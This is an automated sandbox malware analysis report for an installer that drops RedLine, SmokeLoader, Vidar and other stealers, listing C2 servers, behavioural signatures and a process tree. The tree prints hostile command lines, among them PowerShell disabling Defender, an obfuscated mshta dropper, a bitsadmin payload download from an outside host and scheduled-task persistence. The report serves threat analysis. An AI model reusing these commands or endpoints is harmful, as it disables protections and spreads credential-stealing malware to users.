Resubmissions

02-11-2021 06:54

211102-hpn1zsbhc2 10

02-11-2021 06:42

211102-hgpmjsgggp 10

01-11-2021 21:47

211101-1ncknsfgfm 10

Analysis

  • max time kernel
    1532s
  • max time network
    28635s
  • platform
    windows10_x64
  • resource
    win10-ja-20211014
  • submitted
    01-11-2021 21:47

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    b5b5fe52ed9ca7d47bfb857498fd684c

  • SHA1

    9c17089a630141c9b4e13ef46ab334d46709fdb8

  • SHA256

    6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

  • SHA512

    482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a

Malware Config

Extracted

Family

redline

Botnet

media0121

C2

91.121.67.60:23325

Extracted

Family

redline

Botnet

newjust

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies system executable filetype association 2 TTPs 3 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata: ET MALWARE FormBook CnC Checkin (POST) M2

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 47 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 52 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 44 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 15 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Script User-Agent 6 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 28 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Suspicious use of SetThreadContext
    PID:5060
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:6952
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:2604
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3324
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4860
        • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\setup_install.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1724
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2104
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1796
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:396
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1896
            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17870faab0.exe
              Mon17870faab0.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3884
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                7⤵
                  PID:7904
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    8⤵
                    • Kills process with taskkill
                    PID:4040
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2228
              • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon178e7a516181.exe
                Mon178e7a516181.exe
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                PID:2888
                • C:\Users\Admin\Pictures\Adobe Films\qxC1nsEi42vuuuXTOfADEOqE.exe
                  "C:\Users\Admin\Pictures\Adobe Films\qxC1nsEi42vuuuXTOfADEOqE.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:5744
                • C:\Users\Admin\Pictures\Adobe Films\MiFnSOOP3jL2bVNTqswI6fwY.exe
                  "C:\Users\Admin\Pictures\Adobe Films\MiFnSOOP3jL2bVNTqswI6fwY.exe"
                  7⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  PID:6492
                • C:\Users\Admin\Pictures\Adobe Films\cyuN1_FPvN4XqHx5jHqquG4S.exe
                  "C:\Users\Admin\Pictures\Adobe Films\cyuN1_FPvN4XqHx5jHqquG4S.exe"
                  7⤵
                    PID:6464
                  • C:\Users\Admin\Pictures\Adobe Films\l9hzlz9ZLt7XuMB8ACGsfFI8.exe
                    "C:\Users\Admin\Pictures\Adobe Films\l9hzlz9ZLt7XuMB8ACGsfFI8.exe"
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    PID:6452
                  • C:\Users\Admin\Pictures\Adobe Films\JFsLr_kYtI5uwpoVO5P9lW6c.exe
                    "C:\Users\Admin\Pictures\Adobe Films\JFsLr_kYtI5uwpoVO5P9lW6c.exe"
                    7⤵
                      PID:6432
                      • C:\Users\Admin\Documents\Eis8rgwPfplaNhGmdMf5sxxc.exe
                        "C:\Users\Admin\Documents\Eis8rgwPfplaNhGmdMf5sxxc.exe"
                        8⤵
                        • Checks computer location settings
                        PID:5776
                        • C:\Users\Admin\Pictures\Adobe Films\OrYBZcRWcgHzIxQuvrmVk6aL.exe
                          "C:\Users\Admin\Pictures\Adobe Films\OrYBZcRWcgHzIxQuvrmVk6aL.exe"
                          9⤵
                            PID:7116
                          • C:\Users\Admin\Pictures\Adobe Films\fyLnniPK_2OpBz3Y2dvMpj4C.exe
                            "C:\Users\Admin\Pictures\Adobe Films\fyLnniPK_2OpBz3Y2dvMpj4C.exe"
                            9⤵
                              PID:6088
                            • C:\Users\Admin\Pictures\Adobe Films\eRnDf2CSvKqVjRsdrizTS0l9.exe
                              "C:\Users\Admin\Pictures\Adobe Films\eRnDf2CSvKqVjRsdrizTS0l9.exe"
                              9⤵
                                PID:2320
                              • C:\Users\Admin\Pictures\Adobe Films\Uu8ktdPLBFcY1iPXMPwESBiH.exe
                                "C:\Users\Admin\Pictures\Adobe Films\Uu8ktdPLBFcY1iPXMPwESBiH.exe"
                                9⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:4496
                              • C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe
                                "C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"
                                9⤵
                                • Checks whether UAC is enabled
                                PID:6868
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                  10⤵
                                  • Checks whether UAC is enabled
                                  PID:5136
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe" ) do taskkill -f -iM "%~NxM"
                                    11⤵
                                      PID:1544
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill -f -iM "c9ERkf7LMTbBMG3_wz5MOpln.exe"
                                        12⤵
                                        • Kills process with taskkill
                                        PID:4936
                                • C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe"
                                  9⤵
                                    PID:5712
                                    • C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe" -u
                                      10⤵
                                        PID:1324
                                    • C:\Users\Admin\Pictures\Adobe Films\xyNtQmrvs194C2q9XHvjvThR.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\xyNtQmrvs194C2q9XHvjvThR.exe"
                                      9⤵
                                        PID:5628
                                      • C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe"
                                        9⤵
                                          PID:1108
                                          • C:\Users\Admin\AppData\Local\Temp\is-E2TS2.tmp\tJWpYBfBdpnOujp6qGKB_GWA.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-E2TS2.tmp\tJWpYBfBdpnOujp6qGKB_GWA.tmp" /SL5="$5030C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe"
                                            10⤵
                                            • Loads dropped DLL
                                            • Checks whether UAC is enabled
                                            PID:3580
                                            • C:\Users\Admin\AppData\Local\Temp\is-KHKDU.tmp\DYbALA.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-KHKDU.tmp\DYbALA.exe" /S /UID=2709
                                              11⤵
                                              • Drops file in Drivers directory
                                              • Adds Run key to start application
                                              PID:1248
                                              • C:\Program Files\Windows Security\ODBLXPRXLV\foldershare.exe
                                                "C:\Program Files\Windows Security\ODBLXPRXLV\foldershare.exe" /VERYSILENT
                                                12⤵
                                                • Checks whether UAC is enabled
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                PID:6152
                                              • C:\Users\Admin\AppData\Local\Temp\bf-eb2d8-8db-c43b9-ac517c6b472ed\Vyzharogaewi.exe
                                                "C:\Users\Admin\AppData\Local\Temp\bf-eb2d8-8db-c43b9-ac517c6b472ed\Vyzharogaewi.exe"
                                                12⤵
                                                • Checks computer location settings
                                                PID:2176
                                              • C:\Users\Admin\AppData\Local\Temp\6d-c4a2c-988-06c9e-aceb445de7633\Qaehoxekile.exe
                                                "C:\Users\Admin\AppData\Local\Temp\6d-c4a2c-988-06c9e-aceb445de7633\Qaehoxekile.exe"
                                                12⤵
                                                • Checks whether UAC is enabled
                                                PID:3972
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe /eufive & exit
                                                  13⤵
                                                    PID:6200
                                                    • C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe
                                                      C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe /eufive
                                                      14⤵
                                                        PID:4396
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe /qn CAMPAIGN="654" & exit
                                                      13⤵
                                                        PID:7532
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          14⤵
                                                            PID:6584
                                                          • C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe
                                                            C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe /qn CAMPAIGN="654"
                                                            14⤵
                                                            • Loads dropped DLL
                                                            • Checks whether UAC is enabled
                                                            • Enumerates connected drives
                                                            • Modifies system certificate store
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:7452
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634218862 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                              15⤵
                                                                PID:9124
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe & exit
                                                            13⤵
                                                              PID:2848
                                                              • C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe
                                                                C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe
                                                                14⤵
                                                                  PID:7232
                                                                  • C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe" -u
                                                                    15⤵
                                                                      PID:8720
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe /mixfive & exit
                                                                  13⤵
                                                                    PID:5612
                                                                    • C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe /mixfive
                                                                      14⤵
                                                                        PID:1452
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe /S & exit
                                                                      13⤵
                                                                        PID:5700
                                                                        • C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe /S
                                                                          14⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:4888
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                            15⤵
                                                                              PID:8780
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                              15⤵
                                                                                PID:7036
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                15⤵
                                                                                  PID:764
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                  15⤵
                                                                                  • Blocklisted process makes network request
                                                                                  PID:8720
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                  15⤵
                                                                                    PID:1660
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                    15⤵
                                                                                      PID:4108
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        16⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:4216
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                      15⤵
                                                                                      • Checks for any installed AV software in registry
                                                                                      PID:1652
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        16⤵
                                                                                          PID:6848
                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                        "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                        15⤵
                                                                                        • Download via BitsAdmin
                                                                                        PID:6020
                                                                          • C:\Users\Admin\Pictures\Adobe Films\uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe"
                                                                            9⤵
                                                                            • Loads dropped DLL
                                                                            PID:1016
                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                              10⤵
                                                                              • Loads dropped DLL
                                                                              • Adds Run key to start application
                                                                              PID:8056
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                11⤵
                                                                                • Checks whether UAC is enabled
                                                                                PID:8884
                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1cc,0x1d0,0x58,0x1d4,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee0
                                                                                  12⤵
                                                                                    PID:8620
                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff79e239e70,0x7ff79e239e80,0x7ff79e239e90
                                                                                      13⤵
                                                                                        PID:7524
                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,3650273477745804929,15538392481981902781,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8884_81560480" --mojo-platform-channel-handle=1752 /prefetch:8
                                                                                      12⤵
                                                                                        PID:8060
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:7380
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:7224
                                                                            • C:\Users\Admin\Pictures\Adobe Films\G_qlYSMI3UpBnqt1rgDYiWfA.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\G_qlYSMI3UpBnqt1rgDYiWfA.exe"
                                                                              7⤵
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:6856
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                8⤵
                                                                                  PID:1548
                                                                              • C:\Users\Admin\Pictures\Adobe Films\NpNokgBUio4juQ1WHkiRptUG.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\NpNokgBUio4juQ1WHkiRptUG.exe"
                                                                                7⤵
                                                                                  PID:6796
                                                                                • C:\Users\Admin\Pictures\Adobe Films\EfYzouvnW3iAXodDye6sK70I.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\EfYzouvnW3iAXodDye6sK70I.exe"
                                                                                  7⤵
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:6684
                                                                                • C:\Users\Admin\Pictures\Adobe Films\KvYEBWEa6dj4FEFN49knLnSU.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\KvYEBWEa6dj4FEFN49knLnSU.exe"
                                                                                  7⤵
                                                                                    PID:6672
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\EoOquW8c4Vfj_NvcnA6gXyuN.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\EoOquW8c4Vfj_NvcnA6gXyuN.exe"
                                                                                    7⤵
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:6664
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\LgGY89P792Li7mvFxyF8GrqY.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\LgGY89P792Li7mvFxyF8GrqY.exe"
                                                                                    7⤵
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:6612
                                                                                    • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                      8⤵
                                                                                        PID:5076
                                                                                      • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                        "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                        8⤵
                                                                                        • Checks whether UAC is enabled
                                                                                        • Drops file in Program Files directory
                                                                                        PID:2252
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\8QS5QO54Pu7CmqPq1QMNVpdP.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\8QS5QO54Pu7CmqPq1QMNVpdP.exe"
                                                                                      7⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:6604
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\u3cRqTdVGtXPgh8ADvnvPDLI.exe
